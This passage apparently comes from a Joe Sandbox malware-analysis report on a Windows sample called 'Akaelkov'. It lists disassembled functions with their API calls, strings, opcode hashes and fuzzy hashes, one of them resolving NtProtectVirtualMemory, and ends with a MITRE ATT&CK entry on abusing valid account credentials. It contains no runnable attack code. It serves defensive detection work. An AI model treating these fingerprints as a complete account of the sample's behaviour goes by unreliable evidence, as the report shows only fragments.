Instruction ID: 3c1e78264fd294a5261de7da6a61d420fb8273394df39584ff639c2eab58b1f7
Opcode Fuzzy Hash: 9541ffe8c6f5934f064177b02d239282142b545af1f6b59afb9b16bc4ec861e2
Instruction Fuzzy Hash: CE11AF31A007005FEB24CE65A844BBBB7F8FF05765F004529ED55E7240D6B4BC84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04074608 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF,?,?,?,00000002,0407477A,04072DAF,04072DF6), ref: 04074641
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF,?,?,?,00000002,0407477A,04072DAF,04072DF6), ref: 04074647
GetStdHandle.KERNEL32(000000F5,04074690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF), ref: 0407465C
WriteFile.KERNEL32(00000000,000000F5,04074690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF), ref: 04074662
MessageBoxA.USER32(00000000,Runtime error at 00000000,040DA754,00000000), ref: 04074680

Strings

Runtime error at 00000000, xrefs: 0407463A, 04074679

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Runtime error at 00000000
API String ID: 1570097196-1393363852
Opcode ID: 494e74b0827591cca06c41cdcd3a375f19fb9a3ed94ee622459e21221ec9b14c
Instruction ID: 8b685dcab7c7540ff1a5ae6febed4f8ff6fad273b46469a6b78a7c465a94568f
Opcode Fuzzy Hash: 494e74b0827591cca06c41cdcd3a375f19fb9a3ed94ee622459e21221ec9b14c
Instruction Fuzzy Hash: 73F030B1F8538075FB20AA606C85FD927989745B2DF148719B720BC0C197E8B8D98F2B

Uniqueness

Uniqueness Score: -1.00%

Function 0408D6E4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0408D6EF
GetCurrentThreadId.KERNEL32 ref: 0408D6FE
RtlEnterCriticalSection.NTDLL(0410A2EC), ref: 0408D743
InterlockedExchange.KERNEL32(040DAAF0,?), ref: 0408D75F
RtlLeaveCriticalSection.NTDLL(0410A2EC), ref: 0408D7B8
RtlEnterCriticalSection.NTDLL(0410A2EC), ref: 0408D827

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CriticalSection$CurrentEnterThread$ExchangeInterlockedLeave
String ID:
API String ID: 1985336998-0
Opcode ID: 2157fb84626f23085ab54f4f298206602b42cd3ca00acadbfc6b9bce96fee5ee
Instruction ID: ace7a337e41b17dcdeb55c1f9236aa615d61eb5c4f133f164f74f95088353b51
Opcode Fuzzy Hash: 2157fb84626f23085ab54f4f298206602b42cd3ca00acadbfc6b9bce96fee5ee
Instruction Fuzzy Hash: C531E230B04744AFE701EBA4C950AA9B7E8EF09718F5189B8E841E7690E7797840CE26

Uniqueness

Uniqueness Score: -1.00%

Function 040C1D24 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 040C1D79
CreateFontIndirectA.GDI32(?), ref: 040C1D86
SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 040C1DC5
CreateFontIndirectA.GDI32(?), ref: 040C1DD5
CreateFontIndirectA.GDI32(?), ref: 040C1DEE

Part of subcall function 04092518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04092525

GetStockObject.GDI32(0000000D), ref: 040C1E14

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CreateFontIndirect$InfoParametersSystem$ObjectStock
String ID:
API String ID: 2473929816-0
Opcode ID: b08809faadd5dfff5acc140fbb44c5fb71523f1accf4a39510c0de072061d410
Instruction ID: 5d77d623d68b401a5bcf6420b62bb0c9b12a21f105013ce3c3a99c7a5b244bf6
Opcode Fuzzy Hash: b08809faadd5dfff5acc140fbb44c5fb71523f1accf4a39510c0de072061d410
Instruction Fuzzy Hash: DD31AF30A05604EBFB54EB64C841BD937F4EF44308F4484B4A948EB286DE75BC49CB26

Uniqueness

Uniqueness Score: -1.00%

Function 040C6C70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 040C6CA4
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 040C6CB5

Strings

comctl32.dll, xrefs: 040C6C84
comctl32.dll, xrefs: 040C6C9F
ImageList_WriteEx, xrefs: 040C6CAF

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 1646373207-3125200627
Opcode ID: f06882d9824c401dfe8034cfdd0bc5f9477a7ec27eee6b2781c77965e28042a9
Instruction ID: d4328a38df3a397cf85fbe5e37b62c2074667c524a7c7dbeb9bde6c6d7117830
Opcode Fuzzy Hash: f06882d9824c401dfe8034cfdd0bc5f9477a7ec27eee6b2781c77965e28042a9
Instruction Fuzzy Hash: 14214170B00740EBF720AF79DC55A6D37A9EB4575CB00482CA815F7650DAB7BC80DA12

Uniqueness

Uniqueness Score: -1.00%

Function 040A3008 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 040902A4: RegCloseKey.ADVAPI32(10940000,04090180,00000001,04090222,?,?,040976BA,00000008,0410A374,00000048,00000000,0409775F), ref: 040902B8

Part of subcall function 04090308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040904A2), ref: 04090374

Part of subcall function 0407DC04: SetErrorMode.KERNEL32 ref: 0407DC0E
Part of subcall function 0407DC04: LoadLibraryA.KERNEL32(00000000,00000000,0407DC58,?,00000000,0407DC76), ref: 0407DC3D

GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 040A30C1
FreeLibrary.KERNEL32(?,040A30FB,?,00000000,00000000,040A313B), ref: 040A30EE

Strings

Layout File, xrefs: 040A308D
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 040A3075
KbdLayerDescriptor, xrefs: 040A30B8

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Library$AddressCloseErrorFreeLoadModeOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3547551084-2194312379
Opcode ID: 53130c19bc368839eb21ae60212cb7a6c0c46de722727f8fddc8cff56c19e5b9
Instruction ID: aa041e439b52b82d1402e378a9fdf718ce0eaba7d654a4487d16db83b1345825
Opcode Fuzzy Hash: 53130c19bc368839eb21ae60212cb7a6c0c46de722727f8fddc8cff56c19e5b9
Instruction Fuzzy Hash: B0215E71E00249AFEF01EFE4C8519DEB7B6EB89708F518464E810B7600DB39B955CB65

Uniqueness

Uniqueness Score: -1.00%

Function 040C1C88 Relevance: 7.6, APIs: 5, Instructions: 57windowthreadCOMMON

Download Yara Rule

APIs

WindowFromPoint.USER32(?,?), ref: 040C1CB0
GetCurrentThreadId.KERNEL32 ref: 040C1CC5
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 040C1CEE
SendMessageA.USER32(00000000,00000020,00000000,?), ref: 040C1D00
SetCursor.USER32(00000000), ref: 040C1D12

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: MessageSend$CurrentCursorFromPointThreadWindow
String ID:
API String ID: 3188251016-0
Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction ID: df552f9b2504a46f07e9edcb53a08e924c8885b8193d04f3b04febf6b246881a
Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction Fuzzy Hash: 6501D236604340B5E7202B648C80FBF3AA9DF85A9DF10445DFA84BF291E625F801972B

Uniqueness

Uniqueness Score: -1.00%

Function 0407BC00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0407BDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0407BC2F

Strings

ggg, xrefs: 0407BD15
eeee, xrefs: 0407BD3E
yyyy, xrefs: 0407BD25

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: LocaleThread
String ID: eeee$ggg$yyyy
API String ID: 635194068-1253427255
Opcode ID: fafe85e1b10209e8de6501013a9e1333d54780c7252bdf55d882aca74e754ee2
Instruction ID: e98162ed0069d79dd036f65589300124ea191d829f079558304d48f9b425e51f
Opcode Fuzzy Hash: fafe85e1b10209e8de6501013a9e1333d54780c7252bdf55d882aca74e754ee2
Instruction Fuzzy Hash: 6B41DF60F141059BF751AA6988906FEB7FADB8120CB24C525D461FB344EA38FD068A2F

Uniqueness

Uniqueness Score: -1.00%

Function 0408FC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 0408FC21
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FC27

Strings

NtProtectVirtualMemory, xrefs: 0408FC17
C:\Windows\System32\ntdll.dll, xrefs: 0408FC1C

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: 758618e3320203c68c59291ac3ee4df96d92a460f382b4dda182b8766efec0bc
Instruction ID: d8ace7c989319699a1d33299b9cf78382b32ffaf4110374d416b2a14d6abcf9f
Opcode Fuzzy Hash: 758618e3320203c68c59291ac3ee4df96d92a460f382b4dda182b8766efec0bc
Instruction Fuzzy Hash: 42E0BF755003496F8B40EFA9DE85D8B37ECAB2C6647404404BA19DB201C675F9908F75

Uniqueness

Uniqueness Score: -1.00%

Function 0407D6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,040D910B,00000000,040D911E), ref: 0407D6A6
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0407D6B7

Strings

GetDiskFreeSpaceExA, xrefs: 0407D6B1
kernel32.dll, xrefs: 0407D6A1

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 9c02093551bf3ff9bff981cabc33e5637cccf5a022bb205d5ead2f0cab047a80
Instruction ID: 762446933a0acce8f81aa32cee6dfd1d8cf1f74d143ed2877628e2ad8f1a7905
Opcode Fuzzy Hash: 9c02093551bf3ff9bff981cabc33e5637cccf5a022bb205d5ead2f0cab047a80
Instruction Fuzzy Hash: 2FD05EA0F123844BEF00BEB064C460122E4EF00A18B0005356C09BA200C77DB859CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 040AD52C Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 040AD6AB
MulDiv.KERNEL32(?,?,?), ref: 040AD6E6

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170555f25b4abefc5c958aea68061aa0178de36be9c3f4aab84c3def74b5a539
Instruction ID: 57660115a31b5b5f62d34f0f5375632ba21897700c18a34d9be523804ac3bda0
Opcode Fuzzy Hash: 170555f25b4abefc5c958aea68061aa0178de36be9c3f4aab84c3def74b5a539
Instruction Fuzzy Hash: 13D17770A04A099FDB01CFB8C484AAEBBF2FF49300F148959E85AABB54D735F951CB51

Uniqueness

Uniqueness Score: -1.00%

Function 040A80E0 Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 040A8155
GetDesktopWindow.USER32 ref: 040A8285
SetCursor.USER32(00000000), ref: 040A82C5
SetCursor.USER32(00000000), ref: 040A82DA

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CursorDesktopWindow
String ID:
API String ID: 3023140981-0
Opcode ID: f9c2597fc8a39cb710f02438efc8c15cefba29feeaffbbba5de2c7ace03139ee
Instruction ID: 449e8bf389a0aaf1a6b169fb7233bf210b9c3d2d45f5c83fedfd3a25ae1bb71d
Opcode Fuzzy Hash: f9c2597fc8a39cb710f02438efc8c15cefba29feeaffbbba5de2c7ace03139ee
Instruction Fuzzy Hash: 3C915775A00201CFD700EF6AE188A5A77F5EFA4388F048494E944AB365DBB8FCD5DB91

Uniqueness

Uniqueness Score: -1.00%

Function 040BD6DC Relevance: 6.2, APIs: 4, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 040BD800
SetMenu.USER32(00000000,00000000), ref: 040BD81D
SetMenu.USER32(00000000,00000000), ref: 040BD852
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 040BD8B5

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Menu$Window
String ID:
API String ID: 939306805-0
Opcode ID: 6effb8cf458df6d67ad2625eec8ee92d95e48434a9c0f6c83910d3260a743de0
Instruction ID: 2a24b97bfb2dd2a3d8035b0f6d7c0508e5331c3a63623880ae9345a7436eca1c
Opcode Fuzzy Hash: 6effb8cf458df6d67ad2625eec8ee92d95e48434a9c0f6c83910d3260a743de0
Instruction Fuzzy Hash: A2519270B043045BEB65AF788894BDAA7E5AF4034CF0444B9ACC4BF296DA78F845C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0407F554 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0407F603
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0407F61F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0407F696
VariantClear.OLEAUT32(?), ref: 0407F6BF

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 3199a65c74fe308ba87df8a044d2dad4a392f4fc5c11a46cde629df331eaf50c
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: DD41D7B5E0161E9BDB61EF58C890BD9B3FCAB48618F0041D5E649F7211DA70BF808F69

Uniqueness

Uniqueness Score: -1.00%

Function 0408D6E2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0408D6EF
GetCurrentThreadId.KERNEL32 ref: 0408D6FE
RtlEnterCriticalSection.NTDLL(0410A2EC), ref: 0408D743
InterlockedExchange.KERNEL32(040DAAF0,?), ref: 0408D75F

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID:
API String ID: 2380408948-0
Opcode ID: db34f4daf4ff74cbab724dc7fd804fa4f06141e9acb48df00b387cfd3d7112a4
Instruction ID: 279ca9c60ee559257a057460ebc75d4d97615a0ebd305f759cfd4a8abfd51b8e
Opcode Fuzzy Hash: db34f4daf4ff74cbab724dc7fd804fa4f06141e9acb48df00b387cfd3d7112a4
Instruction Fuzzy Hash: BD21A130B04644BFE700EBA8C944FA977E8EF05318F408678E841B6290E779B854CF26

Uniqueness

Uniqueness Score: -1.00%

Function 040AA024 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 040AA039
MulDiv.KERNEL32(?), ref: 040AA056
MulDiv.KERNEL32(?), ref: 040AA073
MulDiv.KERNEL32(?), ref: 040AA090

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction ID: 8b76fa14a25502eb500a5419f30d5cf903099fbed463962f726278bb4aed8f4d
Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction Fuzzy Hash: F301622170460CAB9774BD665C44F9B3A9DDFC6768F00843C682EAF342DA66FC25C668

Uniqueness

Uniqueness Score: -1.00%

Function 0408A27C Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0408A293
LoadResource.KERNEL32(?,0408A318,?,?,?,04085D70,?,00000001,00000000,?,0408A1BE,00000000,?), ref: 0408A2AD
SizeofResource.KERNEL32(?,0408A318,?,0408A318,?,?,?,04085D70,?,00000001,00000000,?,0408A1BE,00000000,?), ref: 0408A2C7
LockResource.KERNEL32(04089E88,00000000,?,0408A318,?,0408A318,?,?,?,04085D70,?,00000001,00000000,?,0408A1BE,00000000), ref: 0408A2D1

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction ID: 86340d883e1d1f223855ecb5e0152583bdb960f48c4e8377bf9cf80dd25a8771
Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction Fuzzy Hash: FFF062B37045046F6B44FF6CA940DAB77ECEE89278310441AF90CE7205DA36ED018775

Uniqueness

Uniqueness Score: -1.00%

Function 040C2570 Relevance: 6.0, APIs: 4, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0410A748,0410A74C,040C4D8A), ref: 040C259A
GetCurrentThreadId.KERNEL32 ref: 040C259F
WaitForSingleObject.KERNEL32(0410A750,000000FF,0410A748,040C4D8A), ref: 040C25B4
CloseHandle.KERNEL32(0410A750,0410A748,040C4D8A), ref: 040C25BF

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CloseCurrentEventHandleObjectSingleThreadWait
String ID:
API String ID: 2257156048-0
Opcode ID: f78dbc301034c25b8c83f330a8e25064dea5003f02979032dcd4fe7d51041a30
Instruction ID: 28c6296445151c93ba5ae8652fca3ec2fdddd4e333e806624017c34c66668385
Opcode Fuzzy Hash: f78dbc301034c25b8c83f330a8e25064dea5003f02979032dcd4fe7d51041a30
Instruction Fuzzy Hash: 38F01C70D007409FD754EBBAD444A5A37F4EB14398B048918A005D3180CBFEB8C0CF16

Uniqueness

Uniqueness Score: -1.00%

Function 040921F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 040914D8: RtlEnterCriticalSection.NTDLL(?), ref: 040914DC

CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,040923EC,?,00000000,04092414), ref: 04092327
CreateFontIndirectA.GDI32(?), ref: 040923C9

Strings

Default, xrefs: 040922EE, 040922FC, 040922FD

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString
String ID: Default
API String ID: 249151401-753088835
Opcode ID: 06c58d6f73d220a55301809dbe23c6d40ad95a179da5142166890c0f5ab95c6b
Instruction ID: c60a427da9bf8a428c627f98a2ff8d6dead61e4897c0c23bb7295a393f8a730a
Opcode Fuzzy Hash: 06c58d6f73d220a55301809dbe23c6d40ad95a179da5142166890c0f5ab95c6b
Instruction Fuzzy Hash: 1D616D30A04248EFEF01DFA8C5407DDBBF5AF49218F1488A9D840BB252D374AE45EB66

Uniqueness

Uniqueness Score: -1.00%

Function 04071D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c17c319ad2af686ef2975642c6b07a159571c15d5790263037ff4287f980ccc
Instruction ID: 977bde441474637a00b5f788800df89dd00cdd0b15874689b3aa24ab7bf4af94
Opcode Fuzzy Hash: 7c17c319ad2af686ef2975642c6b07a159571c15d5790263037ff4287f980ccc
Instruction Fuzzy Hash: A6A1F972F106004BE718AA7C9C853ADB3C1DB85369F18827ED114EF3C1EB68E945839B

Uniqueness

Uniqueness Score: -1.00%

Function 0407A5EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0407A6DA), ref: 0407A672
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0407A6DA), ref: 0407A678

Strings

yyyy, xrefs: 0407A64D

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 94805b61c8a8589ad842cad443bb292a989d02c3f3306741843a8478aef76327
Instruction ID: 78699dc37da326525a249bb06e8732d461622039cbace5c1334c143d498613e9
Opcode Fuzzy Hash: 94805b61c8a8589ad842cad443bb292a989d02c3f3306741843a8478aef76327
Instruction Fuzzy Hash: 7A216D75F00258AFEB50DBA4C881AEEB3E8EF08714F4144A5E905F7250D634BE40CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 040736D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 0407373B

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 040736E8
FPUMaskValue, xrefs: 0407371C

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Close
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3535843008-4173385793
Opcode ID: 8a5622428846558c24801c5029bd4df128c85692c640a450fd64e36cd5306931
Instruction ID: 37a1352580b42ce8162c93182bf767b6be090f87a5c470c20e44d0c288b7cded
Opcode Fuzzy Hash: 8a5622428846558c24801c5029bd4df128c85692c640a450fd64e36cd5306931
Instruction Fuzzy Hash: 480152B5E40358BAEB21DF909D46FED77ECDB09B04F500061BE00FA580E6796910DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0409AD88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 0409ADEA

Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23

GetSystemMetrics.USER32(?), ref: 0409ADB0

Strings

GetSystemMetrics, xrefs: 0409AD98

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: fca3a15d0677eaa3db72385faec07a6504b4f3a2c13c435f2bd014f9e520fd2f
Instruction ID: 0c12e217be0c28e17afa216cb99dd6050e7fbdf1882da95b47bbe2a8c167c80f
Opcode Fuzzy Hash: fca3a15d0677eaa3db72385faec07a6504b4f3a2c13c435f2bd014f9e520fd2f
Instruction Fuzzy Hash: 9AF0CD703122C05FDF108A38D98426A35D6FB8527AB684A21A2176E1C0E5EDBC80BE11

Uniqueness

Uniqueness Score: -1.00%

Function 040A31E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 040A3203
GetKeyState.USER32(00000011), ref: 040A3214

Strings

, xrefs: 040A3223

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction ID: c1528fb011263922634549d23973de5e10801e08bcb8b693b89d84709fd0c724
Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction Fuzzy Hash: 36E09232B0074122F62279E83C003E757D14F527ACF0806AABED43A1C1E6A6392192A6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

